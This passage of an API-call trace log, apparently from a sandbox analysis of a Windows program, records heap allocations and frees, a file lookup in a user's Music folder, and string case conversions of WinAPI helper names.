RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0115.577] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688891c0, ftCreationTime.dwHighDateTime=0x1d5ebe0, ftLastAccessTime.dwLowDateTime=0xc9dd75c0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0xc9dd75c0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x132ef, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="zMKZMHlWmMpV7lZ.m4a", cAlternateFileName="ZMKZMH~1.M4A")) returned 0x41ac600 [0115.577] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0115.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0115.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0115.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0115.578] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0115.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0115.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0115.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0115.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0115.578] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0115.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0115.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0115.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0115.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0115.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0115.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0115.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0115.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0115.627] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0115.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0115.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0115.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0115.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0115.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0115.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0115.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0115.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0115.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0115.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0115.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0115.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0115.629] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0115.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0115.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4480 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.631] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0115.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.634] HeapFree (in: 